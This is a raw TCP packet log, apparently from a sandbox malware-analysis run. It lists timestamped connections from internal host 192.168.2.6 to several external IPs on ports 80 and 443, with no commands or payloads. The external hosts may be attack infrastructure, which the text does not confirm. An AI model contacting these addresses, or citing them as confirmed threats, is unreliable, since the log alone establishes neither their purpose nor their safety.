                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.826791048 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.826792955 CET4994280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.826826096 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.827110052 CET4996580192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.946691036 CET8049965185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.946784019 CET4996580192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.946995020 CET4996580192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.947324991 CET8049942185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.947377920 CET4994280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959505081 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959547043 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959557056 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959572077 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959605932 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959661961 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959680080 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959691048 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959702015 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959728956 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959744930 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959990978 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.960001945 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.960035086 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.960048914 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.968178988 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.968317032 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.968332052 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.970953941 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.975979090 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.976246119 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.066577911 CET8049965185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.078931093 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.079014063 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.079075098 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.108325005 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.108403921 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.109687090 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.109698057 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.109919071 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.111136913 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.111270905 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.111275911 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.151407957 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.151642084 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.154963970 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.155282021 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.155426025 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.155477047 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.163280964 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.163501024 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.167007923 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.171236992 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.171725988 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.174992085 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.179176092 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.179934978 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.182955980 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.187092066 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.187860012 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.190996885 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.195118904 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.195262909 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.199002028 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.204255104 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.204267979 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.204983950 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.211709023 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.211723089 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.214996099 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.219424009 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.220170021 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.222974062 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.225878000 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.225949049 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.226170063 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.226973057 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.231969118 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.232273102 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.234987974 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.343549967 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.343728065 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.346513033 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.346548080 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.346590996 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.346626997 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.353125095 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.353280067 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.354958057 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.359517097 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.359791040 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.363002062 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.364139080 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.364518881 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.364573002 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.368890047 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.369261026 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.371015072 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.373521090 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.373696089 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.373755932 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.377950907 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.378079891 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.378959894 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.382484913 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.382950068 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.383022070 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.386965036 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.387222052 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.387411118 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.387453079 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.391726017 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.392174959 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.395071983 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.396200895 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.396372080 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.396426916 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.400855064 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.401000023 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.403001070 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.405189037 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.405325890 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.406979084 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.410005093 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.410218000 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.410276890 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.414323092 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.414522886 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.414947987 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.419006109 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.419100046 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.423005104 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.423382044 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.423567057 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.423614025 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.427949905 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.428296089 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.430947065 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.432435989 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.432739019 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.432794094 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.437084913 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.437374115 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.438949108 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.441581964 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.441782951 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.441833973 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.619965076 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.739377022 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803069115 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803159952 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803216934 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803405046 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803411007 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803421021 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.803426027 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.856940985 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.857033968 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.857079983 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.857810974 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.857827902 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.877460003 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.877497911 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.877564907 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.878746033 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.878758907 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.114501953 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.114567041 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.316210032 CET8049965185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.316284895 CET4996580192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.317715883 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.317892075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.372466087 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.372473955 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.372541904 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.372787952 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.372798920 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.437299967 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.437475920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.437544107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.437980890 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.438029051 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.557065010 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.091577053 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.091676950 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.092822075 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.092833042 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.093056917 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.094223976 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.094248056 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.094291925 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.585443974 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.585546017 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.589731932 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.589741945 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.589975119 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.591582060 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.592900991 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.592936993 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.593045950 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.593081951 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.593219995 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.593262911 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.593446016 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.593467951 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.594276905 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.594310999 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596091986 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596122980 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596136093 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596144915 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596276999 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596303940 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596328974 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596467972 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.596498966 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643325090 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643573999 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643608093 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643627882 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643646002 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643696070 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.643709898 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776118994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776176929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776190996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776191950 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776230097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776397943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776416063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776428938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776439905 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776452065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776458025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776484966 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776504993 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.777093887 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.777113914 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.777141094 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.777151108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858618975 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858664989 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858714104 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858720064 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858737946 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858777046 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858788013 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858930111 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858969927 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.858978987 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.866993904 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.867043018 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.867050886 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.881361008 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.881511927 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.881520033 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.895571947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.895628929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.895692110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.895739079 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.934253931 CET49967443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.978008032 CET44349967104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.002422094 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.002674103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.002767086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.006736040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.006913900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.006973028 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.014972925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.017007113 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.017971039 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.018610001 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.018655062 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.026391983 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.026453972 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.026524067 CET8049969185.215.113.16192.168.2.6
